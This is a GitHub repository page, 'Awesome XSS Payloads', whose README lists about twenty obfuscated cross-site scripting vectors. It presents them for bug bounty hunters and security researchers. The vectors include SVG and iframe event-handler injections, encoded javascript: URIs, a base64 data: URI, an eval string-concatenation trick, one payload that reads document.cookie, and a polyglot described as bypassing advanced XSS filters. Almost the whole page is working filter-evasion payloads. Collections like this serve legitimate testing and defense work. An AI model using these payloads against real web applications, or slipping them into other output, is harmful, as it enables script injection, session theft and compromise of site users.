Skip to content

Exotic and uncommon XSS Vectors to hit the target as quickly as possible.

Notifications You must be signed in to change notification settings

humblelad/Awesome-XSS-Payloads

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

18 Commits
 
 

Repository files navigation

Awesome XSS Payloads and Vectors

Exotic and uncommon XSS Vectors to hit the target as quickly as possible. THIS IS SPECIALLY FOR BUG BOUNTY HUNTERS AND SECURITY RESEARCHERS.

I REQUEST TO CONTRIBUTE TO THE PROJECT BY INCLUDING ONLY HIGHLY EXOTIC XSS VECTORS.

“><svg/onload=alert(document.domain)>”@x.y

<svg onload="alert(1)" <="" svg=""

<</p>iframe src=javascript:alert()//

<iframe/src=j%0aa%0av%0aa%0as%0ac%0ar%0ai%0ap%0t:prompt `1`>

%22%3e%3c%5K/onwheel=alert(1)%3emouse%20wheel%20here%3c%21--

„> <img src = x onerror = javascript: alert (1); …

onerror%3Deval%3Bthrow'%3Dalert%5Cx281%5Cx29'%3B

<iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00>

<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"

&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>
  '
<--`<img/src=` onerror=alert(1)> --!>
  
'';!--\"&lt;XSS&gt;=&{()}

¼script¾alert(¢XSS¢)¼/script¾

“><s”%2b”cript>alert(document.cookie)</script>

<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">

a=\"get\";
b=\"URL(\\"\";
c=\"javascript&#058;\";
d=\"alert('XSS');\\")\";
eval(a+b+c+d);

<w="/x="y>"/ondblclick=`<`[confir\u006d``]>z

<svg•onload=alert(1)>

<!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //># //This payload is used to fool and bypass advanced xss filters by fooling as if it is comments.

About

Exotic and uncommon XSS Vectors to hit the target as quickly as possible.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published